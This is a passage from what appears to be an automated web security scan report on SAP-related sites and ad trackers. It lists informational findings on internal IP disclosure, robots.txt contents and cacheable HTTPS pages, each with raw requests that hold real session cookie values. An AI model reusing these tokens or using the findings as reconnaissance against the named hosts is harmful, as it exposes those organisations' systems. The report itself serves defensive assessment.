Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.84.46
X-Cnection: close
Date: Sat, 15 Oct 2011 14:56:02 GMT
Content-Length: 23847

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.46. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/plugins/like.php?app_id=168685723208922&href=http%3A%2F%2Fwww.newsgator.com&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.151.25
X-Cnection: close
Date: Sat, 15 Oct 2011 15:27:37 GMT
Content-Length: 23557

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.47. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1e4dc8%26origin%3Dhttp%253A%252F%252Fwww.sapvirtualevents.com%252Ff59d1fcc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fsapvirtualevents.com%2Fteched%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.86.52
X-Cnection: close
Date: Sat, 15 Oct 2011 14:30:11 GMT
Content-Length: 25213

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
20.48. http://www.sap.com/sme/seeitinaction/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/index.epx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sme/seeitinaction/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54470
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:13 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:13 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:03:13 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
Height, "9.0.115", "#FFFFFF");

       fo.addVariable("coName", playerType);
       fo.addVariable("dhtml", "false");
       fo.addVariable("xmlFile", theXMLlocation);
       //fo.addVariable("originalPath", "http://10.5.13.238/vince_suriani/smepreview_test/Pages");
       fo.addVariable("flashObjectName", flashObjectName);
       fo.addVariable("pauseImage", pauseImage);

       fo.addVariable("videoWidth", swfWidth);
       fo.addVariabl
...[SNIP]...
21. Robots.txt file  previous  next
There are 22 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

21.1. http://ecohub.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ecohub.sap.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 20 Sep 2011 12:26:30 GMT
ETag: "17c51a-272-4ad5e91b60980"
Accept-Ranges: bytes
Content-Length: 626
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:25:08 GMT
Connection: close

User-agent: *
Disallow: /login
Disallow: /logout
Disallow: /*?search=*
Disallow: /software/
Disallow: /services/
Disallow: /store/analytics/catalog/
Disallow: /store/mobility/catalog/

User-agent: Goo
...[SNIP]...
21.2. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:24:56 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

User-Agent: *
Disallow: /
Noindex: /
21.3. http://forums.sdn.sap.com/forum.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.sdn.sap.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 04 Jul 2011 08:46:52 GMT
ETag: "a45a15-2e8-4a73a689e7700"
Accept-Ranges: bytes
Content-Length: 744
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:24:45 GMT
Connection: close

User-agent: *

Disallow: /~canvas/
Disallow: /images/
Disallow: /message
Disallow: /profile
Disallow: /post
Disallow: /watches
Disallow: /search
Disallow: /*messageID
Disallow: /*?q
Disallow: /*attach
...[SNIP]...
21.4. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 22 Sep 2011 18:11:16 GMT
ETag: "13c00bc-1b-4ad8b9e601900"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 15 Oct 2011 14:22:58 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

21.5. http://leads.demandbase.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leads.demandbase.com
Path:   /in.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leads.demandbase.com

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:19:09 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 06:02:39 GMT
ETag: "906b-1f-4aa206d767dc0"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /stats/
21.6. http://omnituremarketing.d1.sc.omtrdc.net/b/ss/omniturecom,omniturecomdev,omniturecom-2011/1/H.23.4/s07447605198249  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.d1.sc.omtrdc.net
Path:   /b/ss/omniturecom,omniturecomdev,omniturecom-2011/1/H.23.4/s07447605198249

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "2c85a4-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www98
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
21.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sat, 15 Oct 2011 13:47:03 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /
21.8. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omniturestaging.staging.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sat, 15 Oct 2011 13:47:09 GMT
Accept-Ranges: bytes
ETag: W/"25-1317343299000"
Connection: close
Last-Modified: Fri, 30 Sep 2011 00:41:39 GMT
Content-Length: 25

User-agent: *
Disallow: /
21.9. http://pixel.mathtag.com/event/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xcac 3244
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *
21.10. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:24:54 GMT
Expires: Sun, 16 Oct 2011 14:24:54 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
21.11. http://s.analytics.yahoo.com/p.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.analytics.yahoo.com
Path:   /p.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Wed, 24 Aug 2011 07:44:03 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
21.12. http://safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQABiEECCEEDIFBAgAAAE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQABiEECCEEDIFBAgAAAE

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 30 Sep 2011 20:43:32 GMT
Date: Sat, 15 Oct 2011 13:50:12 GMT
Expires: Sat, 15 Oct 2011 13:50:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /
...[SNIP]...
21.13. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 30 Sep 2011 20:43:32 GMT
Date: Sat, 15 Oct 2011 13:50:11 GMT
Expires: Sat, 15 Oct 2011 13:50:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /
...[SNIP]...
21.14. http://sap.112.2o7.net/b/ss/sapcommunity,sapglobal/1/H.21/s01205263920128  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sap.112.2o7.net
Path:   /b/ss/sapcommunity,sapglobal/1/H.21/s01205263920128

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sap.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "75187-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www382
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
21.15. http://static.2mdn.net/csi/d  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.2mdn.net
Path:   /csi/d

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 14:24:55 GMT
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /
21.16. http://weblogs.sdn.sap.com/api/get_wlg_info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://weblogs.sdn.sap.com
Path:   /api/get_wlg_info

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: weblogs.sdn.sap.com

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:25:02 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 16:06:19 GMT
ETag: "f08d2-15c-4a2756fe514c0"
Accept-Ranges: bytes
Content-Length: 348
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cs/
Disallow: /cs/mobile/
Disallow: /pub/cs_disc/
Disallow: /mobile/
Disallow: /cs_msg/
Disallow: /cs_disc/
Crawl-delay: 20

User-agent: Googlebot
Disallo
...[SNIP]...
21.17. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 28 Sep 2011 03:00:23 GMT
Date: Sat, 15 Oct 2011 14:22:00 GMT
Expires: Sat, 15 Oct 2011 14:22:00 GMT
Cache-Control: public, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 57
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
21.18. http://www.sap.com/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /index.epx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/plain
Last-Modified: Wed, 10 Aug 2011 15:33:58 GMT
Accept-Ranges: bytes
ETag: "5a124bec7257cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:48 GMT
Connection: close
Content-Length: 17321

#
# Welcome to SAP.com
#
#
# This is the robots.txt file for SAP.com
#

# SAP.COM Global

User-agent: Baiduspider
Allow: /china
Disallow: /


User-agent: TREX
Disallow: /

user-agent:
...[SNIP]...
21.19. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sap.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Type: text/plain
Last-Modified: Wed, 10 Aug 2011 15:33:58 GMT
Accept-Ranges: bytes
ETag: "5a124bec7257cc1:0"
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Connection: close
Content-Length: 17321

#
# Welcome to SAP.com
#
#
# This is the robots.txt file for SAP.com
#

# SAP.COM Global

User-agent: Baiduspider
Allow: /china
Disallow: /


User-agent: TREX
Disallow: /

user-agent:
...[SNIP]...
21.20. http://www.sapteched.com/sapphirenowsaptechedmadrid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /sapphirenowsaptechedmadrid/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sapteched.com

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: text/plain
Last-Modified: Mon, 04 Jun 2007 13:43:43 GMT
Accept-Ranges: bytes
ETag: "9e561b5eaea6c71:d05"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:21:51 GMT
Connection: keep-alive

User-agent: *
Disallow: /usa/edu_sessions_test/
Disallow: /usa/edu%5Fsessions%5Ftest/
Disallow: /emea/edu_sessions_test/
Disallow: /emea/edu%5Fsessions%5Ftest/
Disallow: /india/edu_sessions_tes
...[SNIP]...
21.21. http://www.sdn.sap.com/irj/scn/forum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/forum

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdn.sap.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 08 Aug 2011 14:08:18 GMT
ETag: "17a879a-abe-4a9fefa999880"
Accept-Ranges: bytes
Content-Length: 2750
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:24:47 GMT
Connection: close

User-agent: *

Allow: /*blog

Disallow: /html/
Disallow: /irj/boc/logon
Disallow: /irj/bpx/logon
Disallow: /irj/scn/logon
Disallow: /irj/sdn/logon
Disallow: /irj/uac/logon
Disallow: /irj/scn/forgotpas
...[SNIP]...
21.22. https://www.sdn.sap.com/irj/sdn/forum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sdn.sap.com
Path:   /irj/sdn/forum

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdn.sap.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 04 Apr 2011 09:39:05 GMT
ETag: "1ac9c1b-3e-4a01487cd2040"
Accept-Ranges: bytes
Content-Length: 62
Content-Type: text/plain
Date: Sat, 15 Oct 2011 14:24:46 GMT
Connection: close

User-agent: *

Disallow: /

User-agent: Googlebot

Disallow: /
22. Cacheable HTTPS response  previous  next
There are 18 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

22.1. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
22.2. https://teched2011madrid.sapevents.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /

Request

GET / HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:32 GMT
Content-Length: 47531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
22.3. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Request

GET /index.cfm?fuseaction=reg.ReturnLogin HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:27 GMT
Content-Length: 31925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
22.4. https://weblogs.sdn.sap.com/pub/q/top_weblogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogs.sdn.sap.com
Path:   /pub/q/top_weblogs

Request

GET /pub/q/top_weblogs HTTP/1.1
Host: weblogs.sdn.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://weblogs.sdn.sap.com/pub/q/top_weblogs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
